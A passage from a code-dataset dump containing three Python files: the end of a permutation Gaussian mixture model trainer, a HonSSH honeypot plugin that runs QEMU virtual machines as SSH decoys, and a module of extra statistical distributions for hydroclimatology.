self.min_covar\n\n elif self._covtype == 'diag-perm':\n from pnet.cyfuncs import calc_new_covar_diagperm as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n self.covars_[:] = self.covars_.clip(min=self.min_covar)\n\n elif self._covtype == 'full':\n from pnet.cyfuncs import calc_new_covar_full as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n for k in range(K):\n #dd = np.diag(self.covars_[k])\n #clipped_dd = dd.clip(min=self.min_covar)\n #self.covars_[k] += np.diag(clipped_dd - dd)\n\n self.covars_[k] = reg_covar(self.covars_[k],\n self.min_covar,\n -9000.0)\n\n #c = self.covars_[k]\n #c = (1 - mcov) * c + mcov * np.eye(c.shape[0])\n #self.covars_[k] = c\n\n elif self._covtype == 'full-perm':\n from pnet.cyfuncs import calc_new_covar_fullperm as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n for p in range(P):\n dd = np.diag(self.covars_[p])\n clipped_dd = dd.clip(min=self.min_covar)\n self.covars_[p] += np.diag(clipped_dd - dd)\n\n elif self._covtype == 'full-full':\n from pnet.cyfuncs import calc_new_covar_fullfull as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n D = self.covars_.shape[2]\n for k, p in itr.product(range(K), range(P)):\n dd = np.diag(self.covars_[k, p])\n clipped_dd = dd.clip(min=self.min_covar)\n #self.covars_[k, p] += np.diag(clipped_dd - dd)\n #self.covars_[k, p] += np.diag(clipped_dd - dd)\n self.covars_[k, p] += np.eye(D) * self.min_covar\n\n # Calculate log likelihood\n loglikelihoods.append(logprob.sum())\n\n ag.info(\"Trial {trial}/{n_trials} Iteration {iter} \"\n \"Time {time:.2f}s Log-likelihood {llh:.2f} \"\n #\"Test log-likelihood {tllh:.2f}\"\n \"\".format(\n trial=trial+1,\n n_trials=self.n_init,\n iter=loop+1,\n time=time.clock() - start,\n llh=loglikelihoods[-1] / N,\n #tllh=test_loglikelihood / HN,\n ))\n\n if loop > 0:\n absdiff = abs(loglikelihoods[-1] - loglikelihoods[-2])\n if absdiff/abs(loglikelihoods[-2]) < self.thresh:\n self.converged_ = True\n break\n\n if loglikelihoods[-1] > max_log_prob:\n ag.info(\"Updated best log likelihood to {}\"\n .format(loglikelihoods[-1]))\n max_log_prob = loglikelihoods[-1]\n best_params = {'weights': 
self.weights_,\n 'means': self.means_,\n 'covars': self.covars_,\n 'converged': self.converged_}\n else:\n ag.info(\"Did not update best\")\n\n self.weights_ = best_params['weights']\n self.means_ = best_params['means']\n self.covars_ = best_params['covars']\n self.converged_ = best_params['converged']\n\n def predict_flat(self, X):\n \"\"\"\n Returns an array of which mixture component each data entry is\n associated with the most. This is similar to `predict`, except it\n collapses component and permutation to a single index.\n\n Parameters\n ----------\n X : ndarray\n Data array to predict.\n\n Returns\n -------\n components: list\n An array of length `num_data` where `components[i]` indicates the\n argmax of the posteriors. The permutation EM gives two indices, but\n they have been flattened according to ``index * component +\n permutation``.\n \"\"\"\n if self.means_.shape[0] == 1:\n return np.zeros(X.shape[0], dtype=np.int64)\n else:\n logprob, log_resp = self.score_block_samples(X)\n ii = log_resp.reshape((log_resp.shape[0], -1)).argmax(-1)\n return ii\n\n def predict(self, X):\n \"\"\"\n Returns a 2D array of which mixture component each data entry is\n associated with the most.\n\n Parameters\n ----------\n X : ndarray\n Data array to predict.\n\n Returns\n -------\n components: list\n An array of shape `(num_data, 2)` where `components[i]` indicates\n the argmax of the posteriors. For each sample, we have two values,\n the first is the part and the second is the permutation.\n \"\"\"\n ii = self.predict_flat(X)\n sh = (self.n_components, len(self.permutations))\n return np.vstack(np.unravel_index(ii, sh)).T\n","sub_path":"pnet/permutation_gmm.py","file_name":"permutation_gmm.py","file_ext":"py","file_size_in_byte":19938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"561027490","text":"#!/usr/bin/env python\n\n# Copyright (c) 2016 Thomas Nicholson \n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. 
The names of the author(s) may not be used to endorse or promote\n# products derived from this software without specific prior written\n# permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE AUTHORS ``AS IS'' AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\n# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\n# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED\n# AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n# SUCH DAMAGE.\n\nfrom os import environ\nfrom copy import deepcopy\nfrom random import randint\nfrom twisted.internet import reactor, defer\nfrom twisted.internet.protocol import ProcessProtocol\nfrom honssh.config import Config\nfrom honssh.utils import validation\nfrom honssh.log import msg\nfrom honssh import spoof, log\n\n\nclass QemuProcessProtocol(ProcessProtocol):\n def __init__(self, qid):\n self.qid = qid\n def done(self, reason):\n msg(log.LGREEN, '[QEMU][PROCESS]', 'Qemu instance <%d> finished. Result: <%s>' %\n (self.qid, reason))\n def childDataReceived(self, childFD, data):\n if data[-1:] == '\\n':\n data = data[:-1]\n if childFD == 1:\n msg(log.PLAIN, '[QEMU][PROCESS]', 'Qemu instance <%d> stdout: <%s>' %\n (self.qid, str(data)))\n elif childFD == 2:\n msg(log.LRED, '[QEMU][PROCESS]', 'Qemu instance <%d> stderr: <%s>' %\n (self.qid, str(data)))\n def errReceived(self, data):\n msg(log.LRED, '[QEMU][PROCESS]', 'Qemu instance <%d> ERROR: <%s>' %\n (self.qid, str(data)))\n def processEnded(self, reason):\n ecode = reason.value.exitCode\n if ecode is not None:\n msg(log.LPURPLE if ecode == 0 else log.LRED,\n '[QEMU][PROCESS]', 'Qemu instance <%d> exited with <%d>' %\n (self.qid, ecode))\n else:\n msg(log.LPURPLE, '[QEMU][PROCESS]', 'Qemu instance <%d> exited' % (self.qid))\n\nclass Qemu(object):\n started = False\n proc = None\n EXEC = 'qemu-system-i386'\n IMAG = 'buildroot/bzImage'\n VNCS = 8\n BIND = '127.0.0.1'\n PORT = 22223\n MEMO = 64\n CORS = 1\n ARGS = ['-enable-kvm','-cpu','host','-m','{MEMO:d}','-smp','{CORS:d}','-net',\n 'nic,model=virtio',\n '-net','user,hostfwd=tcp:{BIND:s}:{PORT:d}-:22','-kernel','{IMAG:s}',\n '-vnc','127.0.0.1:{VNCS:d}']\n allowed_attrs = ['EXEC','IMAG','VNCS',\n 'BIND','PORT','MEMO',\n 'CORS','ARGS']\n\n def __init__(self, qid):\n self.qid = qid\n self.PORT += qid\n self.VNCS += qid\n\n def set_qemu_details(self, **kwargs):\n for key, value in kwargs.items():\n if key in self.allowed_attrs:\n setattr(self, key, value)\n else:\n raise AttributeError('Key <%s> from kwargs not allowed!' 
%\n (key))\n\n def get_qemu_details(self):\n outdict = {}\n for key in self.allowed_attrs:\n outdict[key] = getattr(self, key)\n return outdict\n\n def start(self):\n arglist = self.build_qemu_args(self.EXEC)\n msg(log.LPURPLE, '[QEMU]', 'Starting instance <%d>: <%s>' %\n (self.qid, self.EXEC))\n msg(log.LPURPLE, '[QEMU]', 'Args for instance <%d>: <%s>' %\n (self.qid, ' '.join(arglist)))\n self.proc = reactor.spawnProcess(\n QemuProcessProtocol(self.qid), self.EXEC, [self.EXEC] + arglist,\n environ, usePTY=False,\n childFDs={1:'r',2:'r'}\n )\n self.started = True\n\n def stop(self):\n self.proc.signalProcess('KILL')\n self.started = False\n\n def build_qemu_args(self, arg0):\n outargs = []\n kwargs = self.get_qemu_details()\n for arg in self.ARGS:\n outargs.append(arg.format(**kwargs))\n return outargs\n\nclass Peer(object):\n qemu = None\n count = 0\n\n def __init__(self, qemu):\n self.qemu = qemu\n\nclass QemuManager(object):\n _instance = None\n _qemus = []\n _peers = {}\n _plock = defer.DeferredLock()\n\n @classmethod\n def getInstance(cls):\n if cls._instance is None:\n cls._instance = cls()\n return cls._instance\n\n def __init__(self):\n self._qemu_max_instances = 4\n for i in range(self._qemu_max_instances):\n self._qemus.append(Qemu(i))\n reactor.addSystemEventTrigger('before', 'shutdown', self.stopAll)\n\n def start(self, qid):\n return self._qemus[qid].start()\n\n def startAll(self):\n for qemu in self._qemus:\n qemu.start()\n\n def _allStoppedCallback(self):\n msg(log.LYELLOW, '[QEMU][Shutdown]', 'Waiting for all instances to terminate ..')\n for qemu in self._qemus:\n if qemu.proc.pid is not None:\n d = defer.Deferred()\n reactor.callLater(1, d.callback, None)\n return d\n else:\n qemu.proc.loseConnection()\n return None\n\n def stop(self, qid):\n return self._qemus[qid].stop()\n\n def stopAll(self):\n for qemu in self._qemus:\n qemu.proc.signalProcess('KILL')\n return self._allStoppedCallback()\n\n def availableInstance(self, peer_ip):\n if peer_ip not in self._peers:\n inst = self._qemus[randint(0, len(self._qemus)-1)]\n while inst.started is False:\n inst = self._qemus[randint(0, len(self._qemus)-1)]\n self._peers[peer_ip] = Peer(inst)\n else:\n inst = self._peers[peer_ip].qemu\n return (inst.BIND, inst.PORT)\n\n def acquireInstance(self, peer_ip):\n inst = self._peers[peer_ip].qemu\n self._peers[peer_ip].count += 1\n msg(log.LYELLOW, '[QEMU]', 'Acquired instance <%d> for <%s> #<%d>' %\n (inst.qid, peer_ip, self._peers[peer_ip].count))\n\n def releaseInstance(self, peer_ip, login_succeeded):\n if peer_ip in self._peers:\n inst = self._peers[peer_ip].qemu\n if login_succeeded is True:\n self._peers[peer_ip].count -= 1\n if self._peers[peer_ip].count == 0:\n del self._peers[peer_ip]\n\nclass Plugin(object):\n def __init__(self):\n self.cfg = Config.getInstance()\n self.qemu = QemuManager.getInstance()\n self.connection_timeout = self.cfg.getint(['honeypot', 'connection_timeout'])\n self.login_succeeded = False\n\n def get_pre_auth_details(self, conn_details):\n details = self.get_connection_details(conn_details)\n return details\n\n def get_post_auth_details(self, conn_details):\n success, username, password = spoof.get_connection_details(conn_details)\n if success:\n details = self.get_connection_details(conn_details)\n details['username'] = username\n details['password'] = password\n else:\n details = {'success': False}\n return details\n\n def login_successful(self):\n self.qemu.acquireInstance(self.peer_ip)\n self.login_succeeded = True\n\n def connection_lost(self, 
conn_details):\n self.qemu.releaseInstance(self.peer_ip, self.login_succeeded)\n\n def start_server(self):\n self.qemu.startAll()\n\n def get_connection_details(self, conn_details):\n honey_ip, honey_port = self.qemu.availableInstance(conn_details['peer_ip'])\n self.peer_ip = conn_details['peer_ip']\n return {'success': True, 'sensor_name': 'Qemu', 'honey_ip': honey_ip, 'honey_port': honey_port,\n 'connection_timeout': self.connection_timeout}\n\n def validate_config(self):\n section = 'honeypot-static-qemu'\n props = [[section, 'enabled'], [section, 'pre-auth'], [section, 'post-auth']]\n for prop in props:\n if not self.cfg.check_exist(prop, validation.check_valid_boolean):\n return False\n\n Qemu.EXEC = self.cfg.get([section, 'exec'], Qemu.EXEC)\n Qemu.IMAG = self.cfg.get([section, 'image'], Qemu.IMAG)\n Qemu.VNCS = self.cfg.getint([section, 'vnc-start'], Qemu.VNCS)\n Qemu.PORT = self.cfg.getint([section, 'ssh-start'], Qemu.PORT)\n Qemu.MEMO = self.cfg.getint([section, 'memory'], Qemu.MEMO)\n Qemu.CORS = self.cfg.getint([section, 'cpus'], Qemu.CORS)\n\n return True\n","sub_path":"honssh/honeypot/honeypot-static-qemu.py","file_name":"honeypot-static-qemu.py","file_ext":"py","file_size_in_byte":9336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"20524298","text":"\"\"\"\n.. currentmodule:: scikits.hydroclimpy.stats.extradistributions\n\n\nConventions\n===========\n\n* :math:`F` is the cumulative distribution function (CDF).\n* :math:`f` is the probability distribution function (PDF).\n* :math:`x = \cfrac{x - \\xi}{\\alpha}` is a reduced variable,\n where :math:`\\xi` is a location parameter and :math:`\\alpha` is a scale\n parameter.\n\n\nGeneralized normal\n==================\n\nThe generalized normal distribution is defined by its cumulative distribution:\n\n.. math::\n F(x) = \Phi{\left[ -k^{-1} \log\{1 - kx\} \\right]}\n\nwhere :math:`\Phi` is the normal CDF.\n\n* When :math:`k=0`, this expression reduces to the standard normal distribution\n with location parameter :math:`\\xi` and scale parameter :math:`\\alpha`.\n\n\n\nGeneralized logistic\n====================\n\nThe generalized logistic is defined by its CDF:\n\n.. math::\n F(x;k) = \\frac{1}{1 + \left[1 - kx\\right]^{1/k}}\n\nwhere :math:`k` is a shape parameter.\n\n.. The PDF is given by :math:`f(x) = `\nThe PPF is given by :math:`x = k^{-1} [1 - \{(1 - F)/F\}^{k}]`.\n\n\n\nKappa\n=====\n\nThe Kappa distribution is defined by its CDF:\n\n.. math::\n F(x; k, h) = \left[1-h\{1-kx\}^{1/k}\\right]^{1/h}\n\nwhere :math:`k` and :math:`h` are two shape parameters.\n\nThe PPF is given by :math:`x = k^{-1} [1 - \{(1 - F^{h})/h\}^{k}]`\n\n\n\nWakeby\n======\n\nThe Wakeby distribution is defined by the transformation:\n\n.. math::\n \cfrac{x - \\xi}{\\alpha} = \\frac{1}{\\beta} \left[1 - (1-U)^{\\beta}\\right] -\n \\frac{\gamma}{\delta} \left[1 - (1-U)^{-\delta} \\right]\n\nwhere :math:`U` is a standard uniform random variable, and where\n:math:`\\beta`, :math:`\gamma` and :math:`\delta` are three shape parameters.\nThat is, the above equation defines the percent point function for the Wakeby \ndistribution.\n\nThe cumulative distribution function is computed by numerically inverting\nthe percent point function.\nThe probability density function is then found by using the following relation\n(given on page 46 of Johnson, Kotz, and Balakrishnan):\n\n.. 
math::\n f(x) = \cfrac{[1 - F(x)]^{\delta+1}}{%\n \\alpha [1 - F(x)]^{\\beta+\delta} + \gamma}\n\nThe parameters :math:`\\beta`, :math:`\gamma` and :math:`\delta` are shape\nparameters; :math:`\\xi` is a location parameter and :math:`\\alpha` a scale\nparameter.\nWith three shape parameters, the Wakeby distribution can model a wide variety\nof shapes.\n\nThe following restrictions apply to the parameters of this distribution:\n\n* :math:`\\delta < 1.`\n* :math:`\\beta + \delta \geq 0`\n* either :math:`\\beta + \delta > 0` or :math:`\\beta = \gamma = \delta = 0`\n* :math:`\gamma \geq 0`. If :math:`\gamma > 0`, then :math:`\delta > 0`\n* :math:`\\alpha + \gamma \geq 0`.\n\nThe domain of the Wakeby distribution is \n:math:`[\\xi ; +\infty)` for :math:`\delta \geq 0` and :math:`\gamma > 0` and\n:math:`[\\xi ; \\xi + \\alpha (1/\\beta - \gamma/\delta))`\nfor :math:`\delta < 0` or :math:`\gamma = 0`.\n\n\n\nNotes about adding distributions to :mod:`scipy.stats.distributions`.\n=====================================================================\n\nIn scipy, a distribution (`distrib`) is implemented as a generic class \n(`distrib_gen`) which is a subclass of either :class:`rv_continuous` or\n:class:`rv_discrete`.\nThis `distrib_gen` class is a catch-all to define the basic methods, such\nas :meth:`_pdf`, :meth:`_cdf` or :meth:`_ppf`.\n\n\nAttributes\n----------\n\n.. attribute:: a\n\n The lower bound of the validity domain.\n If the lower bound is independent of the input parameters, it can be set\n when creating a new instance of the distribution.\n If the lower bound depends on the parameters, it can be set\n with the :meth:`_argcheck` method.\n\n\n.. attribute:: b\n\n The upper bound of the validity domain.\n If the upper bound is independent of the input parameters, it can be set\n when creating a new instance of the distribution.\n If the upper bound depends on the parameters, it can be set\n with the :meth:`_argcheck` method.\n\n\nMethods\n-------\n\n.. method:: _argcheck\n\n Check the validity of the extra shape parameters.\n By default, the parameters must be strictly positive.\n If this is not the case, a generic condition ``(k==k)`` can be used instead.\n\n\n\"\"\"\n\n\nimport numpy as np\nfrom numpy import exp, floor, log, power, sqrt, where\nimport numpy.random as mtrand\n\nimport scipy.special as special\nimport scipy.optimize as optimize\nimport scipy.stats.distributions as dist\nfrom scipy.stats.distributions import argsreduce, valarray\n\nimport _lmoments\n\narr = np.asarray\n\n__all__ = ['gennorm_gen', 'gennorm', 'glogistic_gen', 'glogistic',\n 'kappa_gen', 'kappa',\n 'logseries_gen', 'logseries',\n 'pearson3_gen', 'pearson3',\n 'wakeby_gen', 'wakeby',\n 'ztnbinom_gen', 'ztnbinom']\n\n\n##--- Continuous distributions -------------------------------------------------\n\nclass kappa_gen(dist.rv_continuous):\n \"\"\"\n The CDF is given by \n\n.. math::\n F(x; k, h) = \left[1-h\{1-kx\}^{1/k}\\right]^{1/h}\n \"\"\"\n def _argcheck(self, k, h):\n k = np.asarray(k)\n h = np.asarray(h)\n # Upper bound\n self.b = where(k <= 0, np.inf, 1. / k)\n # Lower bound\n self.a = where(h > 0,\n where(k == 0, 0., (1 - h ** (-k)) / k),\n where(k < 0, 1. / k, -np.inf))\n return (k == k) | (h == h)\n\n def _cdf(self, x, k, h):\n y = where(k == 0, exp(-x), (1 - k * x) ** (1. / k))\n return where(h == 0, exp(-y), (1. - h * y) ** (1. / h))\n def _pdf(self, x, k, h):\n y = (1 - k * x) ** (1. / k - 1.)\n y *= self._cdf(x, k, h) ** (1. 
- h)\n return y\n def _ppf(self, q, k, h):\n y = where(h == 0, -log(q), (1. - q ** h) / h)\n y = where(k == 0, -log(y), (1. - y ** k) / k)\n return y\n\nkappa = kappa_gen(name='kappa', shapes='k,h', extradoc=\"\"\"\n\n\"\"\")\n\n\nclass glogistic_gen(dist.rv_continuous):\n \"\"\"\nThe CDF is given by\n\n.. math::\n F(x;k) = \\frac{1}{1 + \left[1 - kx\\right]^{1/k}}\n \"\"\"\n #\n numargs = 1\n #\n def _argcheck(self, k):\n return (k == k)\n def _cdf(self, x, k):\n u = where(k == 0, exp(-x), (1. - k * x) ** (1. / k))\n return 1. / (1. + u)\n def _pdf(self, x, k):\n u = where(k == 0, exp(-x), (1. - k * x) ** (1. / k))\n return u ** (1. - k) / (1. + u) ** 2\n def _ppf(self, q, k):\n F = q / (1. - q)\n return where(k == 0, log(F), (1 - F ** (-k)) / k)\n\nglogistic = glogistic_gen(name='glogistic', shapes='k', extradoc=\"\"\"\n\n\"\"\")\n\n\nclass gennorm_gen(dist.rv_continuous):\n \"\"\"\n The CDF is given by \n\n.. math::\n F(x) = \Phi{\left[ -k^{-1} \log\{1 - kx\} \\right]}\n \"\"\"\n #\n numargs = 1\n #\n def _argcheck(self, k):\n return (k == k)\n #\n def _cdf(self, x, k):\n y = where(k == 0, x, -np.log(1. - k * x) / k)\n return 0.5 * (1 + special.erf(y * np.sqrt(0.5)))\n #\n def _pdf(self, x, k):\n u = where(k == 0, x, -log(1. - k * x) / k)\n return exp(k * u - u * u / 2.) / np.sqrt(2 * np.pi)\n #\n def _ppf(self, q, k):\n u = dist._norm_ppf(q)\n return where(k == 0, u, (1. - exp(-k * u)) / k)\n\ngennorm = gennorm_gen(name='gennorm', shapes='k', extradoc=\"\"\"\n\n\"\"\")\n\n\nclass wakeby_gen(dist.rv_continuous):\n \"\"\"\nThe Wakeby distribution is defined by the transformation:\n(x-xi)/a = (1/b).[1 - (1-U)^b] - (c/d).[1 - (1-U)^(-d)]\n\n \"\"\"\n #\n def _argcheck(self, b, c, d):\n b = np.asarray(b)\n c = np.asarray(c)\n d = np.asarray(d)\n check = where(b + d > 0,\n where(c == 0, d == 0, True),\n (b == c) & (c == d) & (d == 0))\n np.putmask(check, c > 0, d > 0)\n np.putmask(check, c < 0, False)\n return check\n #\n def _ppf(self, q, b, c, d):\n z = -np.log(1. - q)\n u = where(b == 0, z, (1. - exp(-b * z)) / b)\n v = where(d == 0, z, (1. - exp(d * z)) / d)\n return u - c * v\n #\n def _cdf(self, x, b, c, d):\n if hasattr(x, '__iter__'):\n cdf = np.array([_lmoments.cdfwak(_, parameters)\n for (_, parameters) in zip(x, zip(b, c, d))])\n else:\n cdf = _lmoments.cdfwak(x, (b, c, d))\n return cdf\n #\n def _pdf(self, x, b, c, d):\n t = (1. - self._cdf(x, b, c, d))\n f = t ** (d + 1) / (t ** (b + d) + c)\n return f\n\n\nwakeby = wakeby_gen(name='wakeby', shapes='beta, gamma, delta', extradoc=\"\"\"\n\n\"\"\")\n\n\n\nclass pearson3_gen(dist.gamma_gen):\n \"\"\"\nThe Pearson III is a particular case of the Gamma distribution.\n\n \"\"\"\n #\n def _fix_loc_scale(self, args, mu, scale=1):\n N = len(args)\n # Get mu and scale (sigma) from args\n if N == 2 and mu is None:\n mu = args[-1]\n elif N == 3 and scale is None:\n (mu, scale) = args[-2:]\n gamma = args[0]\n # Set the default\n if scale is None:\n scale = 1.\n if mu is None:\n mu = 0.0\n # Transforms (gamma, mu, sigma) into (alpha, xi, beta)\n sigma = scale\n if gamma == 0:\n return ((0.,), mu, sigma)\n xi = mu - 2 * sigma / gamma\n beta = sigma * gamma / 2.\n alpha = 4. / gamma ** 2.\n # Returns the result: the first argument must be a tuple\n return ((alpha,), xi, beta)\n\n\n def pdf(self, x, *args, **kwds):\n \"\"\"\n Probability density function at x of the given RV.\n\n Parameters\n ----------\n x : array-like\n quantiles\n arg1, arg2, arg3,... 
: array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n pdf : array-like\n Probability density function evaluated at x\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (x, loc, scale, shape) = map(arr, (x, loc, scale, args[0]))\n x = (x - loc) * 1.0 / scale\n scale = np.abs(scale)\n # \n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isgamma | isnorm)\n indom = (x > self.a) & (x < self.b)\n valid = ispe3 & indom\n #\n output = np.zeros(np.shape(valid), 'd')\n np.putmask(output, (1 - ispe3) * np.array(indom, bool), self.badvalue)\n (x, shape, scale) = argsreduce(valid, *((x, shape, scale,)))\n np.place(output, (valid & isgamma), self._pdf(x, shape) / scale)\n np.place(output, (valid & isnorm), dist._norm_pdf(x) / scale)\n if output.ndim == 0:\n return output[()]\n return output\n\n def cdf(self, x, *args, **kwds):\n \"\"\"\n Cumulative distribution function at x of the given RV.\n\n Parameters\n ----------\n x : array-like\n quantiles\n arg1, arg2, arg3,... : array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n cdf : array-like\n Cumulative distribution function evaluated at x\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (x, loc, scale, shape) = map(arr, (x, loc, scale, args[0]))\n x = (x - loc) * 1.0 / scale\n # \n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isnorm | isgamma)\n indomain = (x > self.a) & (x < self.b)\n toolarge = (x >= self.b)\n valid = ispe3 & indomain\n output = np.zeros(np.shape(valid), 'd')\n np.place(output, (1 - ispe3) * (indomain == indomain), self.badvalue)\n np.place(output, toolarge, 1.0)\n if any(valid): #call only if at least 1 entry\n (x, shape) = argsreduce(valid, *((x,) + (shape,)))\n vals = self._cdf(x, shape)\n np.place(output, (valid & isgamma),\n np.where(scale > 0, vals, 1. - vals))\n np.place(output, (valid & isnorm), dist._norm_cdf(x))\n if output.ndim == 0:\n return output[()]\n return output\n\n\n def sf(self, x, *args, **kwds):\n \"\"\"\n Survival function (1-cdf) at x of the given RV.\n\n Parameters\n ----------\n x : array-like\n quantiles\n arg1, arg2, arg3,... 
: array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n sf : array-like\n Survival function evaluated at x\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (x, loc, scale, shape) = map(arr, (x, loc, scale, args[0]))\n x = (x - loc) * 1.0 / scale\n #\n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isgamma | isnorm)\n indom = (x > self.a) & (x < self.b)\n toosmall = ispe3 & (x <= self.a)\n valid = ispe3 & indom\n output = np.zeros(np.shape(valid), 'd')\n np.place(output, (1 - ispe3) * (indom == indom), self.badvalue)\n np.place(output, toosmall, 1.0)\n (x, shape) = argsreduce(valid, *((x, shape,)))\n vals = self._sf(x, shape)\n np.place(output, (valid & isgamma), np.where(scale > 0, vals, 1. - vals))\n np.place(output, (valid & isnorm), 1. - dist._norm_cdf(x))\n if output.ndim == 0:\n return output[()]\n return output\n\n def ppf(self, q, *args, **kwds):\n \"\"\"\n Percent point function (inverse of cdf) at q of the given RV.\n\n Parameters\n ----------\n q : array-like\n lower tail probability\n arg1, arg2, arg3,... : array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n x : array-like\n quantile corresponding to the lower tail probability q.\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (q, loc, scale, shape) = map(arr, (q, loc, scale, args[0]))\n q = np.where(scale > 0, q, 1. - q)\n #\n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isgamma | isnorm)\n indom = (q > 0) & (q < 1)\n islarge = (q == 1) & ispe3\n valid = ispe3 & indom\n output = valarray(np.shape(valid), value=self.a * np.abs(scale) + loc)\n np.place(output, (1 - ispe3) + (1 - indom) * (q != 0.0), self.badvalue)\n np.place(output, islarge, self.b * np.abs(scale) + loc)\n if any(valid): #call only if at least 1 entry\n (q, shape, scale, loc) = argsreduce(valid, *((q, shape, scale, loc)))\n np.place(output, (valid & isgamma), self._ppf(q, shape) * scale + loc)\n np.place(output, (valid & isnorm), dist._norm_ppf(q) * scale + loc)\n if output.ndim == 0:\n return output[()]\n return output\n\n def isf(self, q, *args, **kwds):\n \"\"\"\n Inverse survival function at q of the given RV.\n\n Parameters\n ----------\n q : array-like\n upper tail probability\n arg1, arg2, arg3,... : array-like\n The shape parameter(s) for the distribution (see docstring of the\n instance object for more information)\n loc : array-like, optional\n location parameter (default=0)\n scale : array-like, optional\n scale parameter (default=1)\n\n Returns\n -------\n x : array-like\n quantile corresponding to the upper tail probability q.\n\n \"\"\"\n (loc, scale) = map(kwds.get, ['loc', 'scale'])\n (args, loc, scale) = self._fix_loc_scale(args, loc, scale)\n (q, loc, scale, shape) = map(arr, (q, loc, scale, args[0]))\n q = np.where(scale > 0, q, 1. 
- q)\n #\n isgamma = (shape > 0) & (scale != 0)\n isnorm = (shape == 0) & (scale > 0)\n ispe3 = (isgamma | isnorm)\n indom = (q > 0) & (q < 1)\n islarge = (q == 1) & ispe3\n valid = ispe3 & indom\n output = valarray(np.shape(valid), value=self.b)\n #place(output,(1-cond0)*(cond1==cond1), self.badvalue)\n np.place(output, (1 - ispe3) * (indom == indom) + (1 - indom) * (q != 0.0),\n self.badvalue)\n np.place(output, islarge, self.a)\n if np.any(valid): #call only if at least 1 entry\n goodargs = argsreduce(valid, *((q,) + args + (scale, loc))) #PB replace 1-q by q\n (q, shape, scale, loc) = argsreduce(valid, *((q, shape, scale, loc)))\n np.place(output, (valid & isgamma), self._isf(q, shape) * scale + loc)\n np.place(output, (valid & isnorm), -dist._norm_ppf(q))\n if output.ndim == 0:\n return output[()]\n return output\n\npearson3 = pearson3_gen(name='Pearson III', shapes='gamma', extradoc=\"\"\"\n\n\"\"\")\n\n\n\n##--- Discrete distributions ---------------------------------------------------\n\n\n# Negative binomial\nclass ztnbinom_gen(dist.rv_discrete):\n def _rvs(self, n, pr):\n return mtrand.negative_binomial(n, pr, self._size)\n def _argcheck(self, n, pr):\n return (n >= 0) & (pr >= 0) & (pr <= 1)\n def _pmf(self, x, n, pr):\n coeff = exp(special.gammaln(n + x) - special.gammaln(x + 1) - special.gammaln(n))\n return coeff * power(pr, n) * power(1 - pr, x) / (1 - power(pr, n))\n def _cdf(self, x, n, pr):\n k = floor(x)\n vals = (special.betainc(n, k + 1, pr) - special.betainc(n, 1, pr))\n return vals / (1. - pr ** n)\n def _sf_skip(self, x, n, pr):\n #skip because special.nbdtrc doesn't work for 0= 1.\n\"\"\"\n )\n\n\n\nclass logseries_gen(dist.rv_discrete):\n def _argcheck(self, pr):\n return (pr > 0) & (pr < 1)\n def _pmf(self, x, pr):\n a = -1. / log(1. - pr)\n return a * pr ** x / x\n def _stats(self, p):\n a = -1. / log(1. - p)\n mu = a * p / (1. - p)\n var = mu * (1. / (1. - p) - mu)\n ap = a * p\n g1 = (1 + p - 3 * ap + 2 * ap * ap) / sqrt(ap * (1 - ap) 